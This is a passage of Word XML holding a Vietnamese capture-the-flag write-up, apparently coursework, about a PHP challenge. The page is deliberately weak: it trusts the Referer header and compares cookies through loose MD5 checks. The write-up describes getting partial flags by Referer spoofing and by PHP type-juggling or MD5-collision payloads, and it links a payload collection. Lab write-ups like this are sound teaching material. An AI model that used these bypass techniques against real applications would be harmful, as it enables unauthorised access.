      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15063249"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C3DEEE"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ab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>echo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Parameter is good even it was &lt;b&gt;True&lt;/b&gt; or &lt;b&gt;False&lt;/b&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4C2414"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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36110861"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if(isset($_SERVER['HTTP_REFERER']) &amp;&amp; $_SERVER['HTTP_REFERER</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>']=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=='http://cyberguy')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B4768"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ab/>
        <w:t>echo($flag1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="026F3647"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F81FEEE"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ab/>
        <w:t xml:space="preserve">echo("&lt;br&gt;Nothing To &lt;b&gt;show&lt;/b&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;br&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391DF90F"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE883F3"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if (isset($_COOKIE['flag']) &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;  isset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>($_COOKIE['flag1']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1AD066"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ab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9D210"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    </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>if($_COOKIE['flag'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>] !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>= $_COOKIE['flag1'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC9725"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    </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF0610"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            if(md5($_COOKIE['flag'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>])=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=md5($_COOKIE['flag1']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D986051"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        </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3DF5D"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           </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>echo "$flag2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="148CC7C2"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         </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D81033"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    </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2739B"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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49DD8C"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C50E57"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC3E837"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if (isset($_GET['flag']) &amp;&amp; $_GET['flag'] == "HiNt" &amp;&amp; isset($_COOKIE['flag']) &amp;&amp; $_COOKIE['flag'] == "True</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22B039D5"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ab/>
        <w:t>echo $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hint;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5DA76E87"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B481C30"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186E53E7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B957F23" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">To Get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Final Flag Try To Search About The Right User-Agent And File ;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B40BA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember: - The Flag Not Always Exits </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> What We See</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292EDF56" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AAFD3"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echo "&lt;br&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1477F35E"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 xml:space="preserve">echo "Your User </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Agent :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - &lt;pre&gt;&lt;b&gt;" . htmlspecilachars($_SERVER['HTTP_USER_AGENT']</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> "&lt;/b&gt;&lt;/pre&gt; I Think You Need It ;)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"  .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> "\n\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58C01C16" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D026802" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405D03C5"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">ta sẽ vào thử trang Robots.txt để xem nhưng bị </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>chặn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B667DBF"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1F309F9A" wp14:editId="2767ACE4">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2F8C8"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Tiếp tục ta vào trang hint.php trên repeater để thực hiện tìm kiếm thì ta có flag1: </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>0xL4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ugh{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>H3r0_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453ED5D1"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4F60676A" wp14:editId="406C3D60">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D7F81"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Ở đoạn code này thì chúng ta được là ta cần phải tìm 2 giá trị md5 băm collision để truyền vào </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333143C4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="137B6CFC" wp14:editId="0110C29D">
            <wp:extent cx="2447925" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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4"/>
                    <a:srcRect t="49874" r="59968" b="22556"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2447925" cy="1047750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401901F"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Theo hướng dẫn của bạn trợ giảng trên lớp thì ta sẽ có thông tin các payload ở dưới đây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B02A78A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId127">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Type%20Juggling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FE22E67"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7B06A3F3" wp14:editId="48CC93D8">
            <wp:extent cx="6114105" cy="3911600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3911600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AF404"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Thực hiện truyền thêm payload là flag và flag1 và thì ta có được flag2 </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>I5_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C102C0D"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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6B50A081" wp14:editId="0F2A694E">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
